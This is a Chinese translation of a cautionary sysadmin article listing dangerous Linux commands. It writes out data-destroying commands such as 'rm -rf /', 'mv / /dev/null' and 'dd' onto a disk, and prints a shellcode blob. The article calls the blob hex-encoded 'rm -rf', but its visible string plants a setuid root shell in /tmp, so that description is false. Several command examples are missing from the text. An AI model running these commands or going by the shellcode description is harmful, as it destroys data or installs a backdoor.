一些您不应该使用的 Linux 命令

当然,除非你想干掉你的机器。

蜘蛛侠有这样的一句信条, "权力越大,责任越大。" 对于 Linux 系统管理员们来说,这也是一种适合采用的明智态度。

不,真的,真心感谢 DevOps 的沟通协作和云编排技术,让一个 Linux 管理员不仅能掌控一台服务器,甚者能控制成千上万台服务器实例。只需要一个愚蠢的举动,你甚至可以毁掉一个价值数十亿美元的企业,比如 not patching Apache Struts

如果不能停留在安全补丁之上,将会带来一个远超过系统管理员工资等级的战略性业务问题。这里就有一些足以攻击 Linux 服务器的方式掌握在系统管理员手中。很容易想象到,只有新手才会犯这些错误,但是,我们需要了解的更多。

下列是一些著名的命令,任何拥有 root 权限的用户都能借助它们对服务器造成严重破坏。

警告:千万不要在生产环境运行这些命令,它们会危害你的系统。不要在家里尝试,也不要在办公室里测试。

那么,继续!

rm -rf /

想要干脆利落的毁掉一个 Linux 系统吗?你无法超越这个被誉为“史上最糟糕”的经典,他能删除一切,我说的是,能删除所有存在你系统里的内容!

和大多数 Linux commands一样,‘rm’这个核心指令使用起来非常方便。即便是最顽固的文件他也能帮你删除。结合起后面两个参数理解‘rm’指令时,你很容易陷入沉思:‘-r’,强制递归删除所有子目录,‘-f’,无需确认,强制删除所有只读文件。如果你在根目录运行这条指令,将清除整个驱动器上的所有数据。

如果你真这么干了,想想该怎么和老板解释吧!

现在,也许你会想,“我永远不会犯这么愚蠢的错误。”朋友,骄兵必败。吸取一下经验教训吧 this cautionary tale from a sysadmin on Reddit:

我在IT界工作了很多年,但是今天,作为 Linux 系统 root 用户,我在错误的系统路径运行了‘rm- f’

长话短说,那天,我需要复制一大堆目录从一个目录到另一个目录,和你一样,我敲了几个‘cp -R’去复制我需要的内容。

在我的聪明才智下,我持续敲着上箭头,在命令记录中寻找可以复制使用的类似命令名,但是它们混杂在一大堆其他命令当中。

不管怎么说,我一边在 Skype、Slack 和 WhatsApp 的网页上打字,一边又和 Sage 通电话,注意力严重分散,我的脑子被‘rm -R ./videodir/* ../companyvideodirwith651vidsin/’这样一条命令自动驱使。

然后,当文件在一片空白后归档,公司的视频文件才出现。幸运的是,在疯狂敲击‘control -C’后,得以在删除大量文件之前,中止了这条命令。但这是对你的警告:任何人都可能犯这样的错误。

事实上,绝大部分现代操作系统都会在你烦这些错误之前,用一段醒目的文字警告你。然而,如果你在连续敲击键盘时忙碌或是分心,你将会把你的系统键入一个黑洞。

这里有一些更为隐蔽的方式调用 rm -rf。思考一下下面的代码

char esp[] __attribute__ ((section(".text"))) = "\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68"

"\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99"

"\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7"

"\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56"

"\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31"

"\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69"

"\x6e\x2f\x73\x68\x00\x2d\x63\x00"

"cp -p /bin/sh /tmp/.beyond; chmod 4755

/tmp/.beyond;";

这是什么?这是 16 进制的‘rm -rf’写法。在你不明确这段代码之前,请不要运行这条命令。

fork 炸弹

既然我们讨论的都是些奇怪的代码,不妨思考一下这一行:

对你来说,这可能看起来有些神秘,但是我看来,它很像那个臭名昭著的 Bash fork bomb。反复启动新的 Bash shell ,直到你的系统资源消耗殆尽直至系统崩溃。

不应该在最新的 Linux 系统上做这些操作。注意,我说的是不应该。我没有说不能。正确设置用户权限,Linux 系统能够阻止这些破坏性行为。通常用户仅限于分配使用机器可用内存。但是如果作为 root 用户的你运行了这行命令(或者它的变式 Bash fork bomb variants),你就需要反复敲击关机命令直到系统重启了。

垃圾数据重写硬盘

有时候你想彻底清除硬盘的数据,你应该使用 Darik's Boot and Nuke (DBAN) 工具去完成这项工作。

但是仅仅在你的存储器里制造最豪华的混乱,是很难彻底清除数据的:

在我说“any command,”时,意味着可以输出任意命令,比如:

…引导目录列表到你的主存储设备。给我 root 权限和足够的时间,就能覆盖整个硬盘设备。相比于盲目恐慌,这才是这天工作的一个好的开始。或者,把它换成 career-limiting crisis

擦除硬盘!

历来另一个受欢迎的擦除硬盘的方式是执行:

你可以用这条命令写入数据到你的硬盘设备。‘dd’命令可以从特殊文件中获取无尽个‘0’字符,并且将它全部写入你的设备。

可能现在 /dev/zero 目录觉得这是个愚蠢的想法,但是它真的管用。比如说,你可以使用 clear unused space in a partition with zeros。它能使分区里的图片压缩到更小以便于数据传输或是存档使用。

在另一方面,它和 dd if=/dev/random of=/dev/hda 近源,除了能毁掉你的一天之外,它并不友善。如果你运行了这个指令(千万不要),你的存储器会被随机数据覆盖。为了隐藏去接管办公室咖啡机的秘密计划,不错,这是一个粗糙的方法,但是你可以使用 DBAN 工具去更好得完成你的任务。

/dev/null 的损失

也许因为数据珍贵,我们对备份的数据没有什么信心,确实很多“永远不要这样做!”的命令都会导致硬盘存储仓库数据被擦除。一个鲜明的实例:另一个毁灭你的存储设备的方式,运行‘mv / /dev/null’或者‘>mv ’。

在前一种情况下,你作为 root 用户,把整个磁盘数据都送进这个如饥似渴的目录 ‘/dev/null’。在后者,你仅仅把家目录喂给这个空空如也的目录,‘/dev/null’。任何一种情况下,除非备份还原,你再也不会再看见你的数据了。

451个研究报告指出,当提到容器的时候,都不要忽略数据持久和数据存储。

Get the report

见鬼,难道会计无论如何都真的不需要最新的应收账款文件吗?

格式化错了驱动器

有时候你必须使用这一条命令格式化驱动器:

…它在格式化 ext3 文件系统的主硬盘驱动器。别,请等一分钟!你正在格式化你的主驱!难道你不需要用它?

当你要格式化驱动器的时候,请务必加倍确认你正在格式化的分区是真的需要格式化的那块还是你正在使用的那块,它们是是固态,闪存还是其他氧化铁。

内核崩溃

一些 Linux 命令不能让你的机器长时间计算。然而,一些命令却可以导致内核崩溃。这些错误通常是由硬件问题引起的,你可以自己解决。

当你遭遇内核崩溃,重新启动系统你才可以恢复工作。在一些情况下,这会有点小烦;在另一些情况下,这是一个大问题,比如说,高负荷运作下的生产环境。下面有一个案例:

这些都会导致内核崩溃。

不要运行你并不了解它功能的命令,它们都在提醒我…

提防未知脚本

年轻或是懒惰的系统管理员喜欢复制别人的脚本。何必重新重复造轮子?这样,它们找到了一个很酷的脚本,并且承诺会自动检查所有备份。它们匆匆得拿走了这样一个命令:

这个下载脚本将输出到 shell 上运行。很明确,别大惊小怪,对吧?不对。这个脚本可能已经被这个恶意软件毒害。当然,一般来说 Linux 比大多数操作系统都要安全,但是如果你把位置代码运行在 root 用户上,什么可能会发生。这个危害不仅在恶意软件上,脚本作者的愚蠢本身同样有害。你甚至可能会因为一个未调试的代码吃上一堑--由于你没有花时间去读它。

You'd never do something like that? Tell me, all those container images you're running on Docker? Do you know what they're really running? I know too many sysadmins who run containers without verifying what's really in them. Don't be like them.

你认为你不会干那样的事?告诉我,所有会有这些事情发生 container images you're running on Docker?你直到它们到底在运行着什么吗?我见过太多都未验证容器里面装着什么就运行它们的系统管理员。请不要和他们一样。

结束

这些故事背后的道理很简单。在你的 Linux 系统里,你有巨大的控制权。你几乎可以让你的服务器做任何事。在你使用你的权限的同时,请务必做认真的确认。如果你没有,你毁灭的不是你的服务器,而是你的工作甚至是你的公司。像蜘蛛侠一样负责任的使用你的权限。

我有没有遗漏什么?在 @sjvn@enterprisenxt 上告诉我那些 Linux命令在你的“Never use this!”的清单上。


via: https://www.hpe.com/us/en/insights/articles/the-linux-commands-you-should-never-use-1712.html

作者:Steven Vaughan-Nichols
译者:译者ID
校对:校对者ID

本文由 LCTT 原创编译,Linux中国 荣誉推出

Hello world!
文章已创建 218

发表评论

邮箱地址不会被公开。 必填项已用*标注

相关文章

开始在上面输入您的搜索词,然后按回车进行搜索。按ESC取消。

返回顶部